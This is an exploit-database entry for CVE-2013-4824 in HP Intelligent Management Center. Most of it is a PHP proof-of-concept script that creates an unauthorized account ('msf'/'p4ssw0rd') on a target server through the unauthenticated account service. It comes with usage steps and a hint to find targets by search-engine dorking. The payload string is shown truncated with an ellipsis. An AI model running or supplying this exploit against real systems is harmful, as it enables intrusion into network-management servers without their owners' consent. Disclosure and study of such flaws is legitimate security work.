📄 HP Intelligent Management 5.1 E0201 Account Creation

27 Nov 2025 00:00:00 | Reported by: indoushka | Type: packetstorm | Source: packetstorm.news | 114 views

HP Intelligent Management Center vulnerability allows new account creation (CVE-2013-4824).

Related (reporter, family: title, published)

Circl (circl): CVE-2013-4824, 29 May 2018 15:50
Check Point Advisories (checkpoint_advisories): HP Intelligent Management Center SOM euAccountSerivce Authentication Bypass (CVE-2013-4824), 22 Dec 2013 00:00
CVE (cve): CVE-2013-4824, 13 Oct 2013 10:00
Cvelist (cvelist): CVE-2013-4824, 13 Oct 2013 10:00
Tenable Nessus (nessus): HP Intelligent Management Center SOM Module < 7.0 E0101 Multiple Vulnerabilities, 9 Jan 2014 00:00
Metasploit (metasploit): HP Intelligent Management SOM Account Creation, 23 Oct 2013 21:01
NVD (nvd): CVE-2013-4824, 13 Oct 2013 10:20
Packet Storm (packetstorm): HP Intelligent Management SOM Account Creation, 31 Aug 2024 00:00
Prion (prion): Authentication flaw, 13 Oct 2013 10:20
RedhatCVE (redhatcve): CVE-2013-4824, 22 May 2025 11:12

=============================================================================================================================================
    | # Title     : HP Intelligent Management 5.1 E0201 Create a new account Vulnerability                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://buy.hpe.com/my/en/software/networking-software/intelligent-management-software/c/1009931441?selector=48             |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or another search engine.
    
    [+] Code Description: Create a new account in HP Intelligent Management Center.
       
       (Related: https://packetstorm.news/files/id/180902/ Linked CVE numbers: CVE-2013-4824).
    
    [+] Save code as poc.php.
    
    [+] Set target: line 19.
    
    [+] Usage: php poc.php
    
    [+] Payload:
    
    
    <?php
    
    function sendRequest($url, $data, $headers = [])
    {
        $ch = curl_init();
    
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    
        $response = curl_exec($ch);
        curl_close($ch);
    
        return $response;
    }
    
    $target = "http://victim-ip:8080"; // change the target address
    $username = "msf";
    $password = "p4ssw0rd";
    
    // Step 1: get the strong name of the service
    $response = sendRequest("$target/servicedesk/servicedesk/servicedesk.nocache.js", "", ["User-Agent: Mozilla/5.0"]);
    preg_match("/unflattenKeylistIntoAnswers\(\['default', 'safari'\], '([0-9A-Fa-f]+)'\);/", $response, $matches);
    $serviceDesk = $matches[1] ?? null;
    
    if (!$serviceDesk) {
        die("فشل في العثور على service desk strong name\n");
    }
    
    echo "Service Desk Strong Name: $serviceDesk\n";
    
    // Step 2: get the strong name of the account service
    $response = sendRequest("$target/servicedesk/servicedesk/{$serviceDesk}.cache.html", "", ["User-Agent: Mozilla/5.0"]);
    preg_match("/'accountSerivce.gwtsvc', '([0-9A-Fa-f]+)', SERIALIZER_1/", $response, $matches);
    $accountService = $matches[1] ?? null;
    
    if (!$accountService) {
        die("فشل في العثور على AccountService strong name\n");
    }
    
    echo "AccountService Strong Name: $accountService\n";
    
    // Step 3: send the request to create the account
    $payload = "6|0|39|http://localhost:8080/servicedesk/servicedesk/|$accountService|com.h3c.imc.eu.client.account.AccountService|addAccount|...";
    $data = [
        'method' => 'POST',
        'uri'    => '/servicedesk/servicedesk/accountSerivce.gwtsvc',
        'ctype'  => 'text/x-gwt-rpc; charset=UTF-8',
        'headers' => [
            "X-GWT-Module-Base: $target/servicedesk/servicedesk/",
            "X-GWT-Permutation: $serviceDesk"
        ],
        'data' => $payload
    ];
    
    $response = sendRequest("$target/servicedesk/servicedesk/accountSerivce.gwtsvc", $payload, [
        "Content-Type: text/x-gwt-rpc; charset=UTF-8",
        "X-GWT-Module-Base: $target/servicedesk/servicedesk/",
        "X-GWT-Permutation: $serviceDesk"
    ]);
    
    if (strpos($response, "already exists") !== false) {
        echo "المستخدم $username موجود بالفعل.\n";
    } elseif (strpos($response, "added successfully") !== false) {
        echo "تم إنشاء الحساب بنجاح: $username / $password\n";
        echo "قم بتسجيل الدخول من: $target/servicedesk/ServiceDesk.jsp\n";
    } else {
        echo "فشل في إنشاء الحساب.\n";
    }
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

27 Nov 2025 00:00 (current): Vulners AI Score 6.7 (medium risk); CVSS 2: 7.5; EPSS: 0.777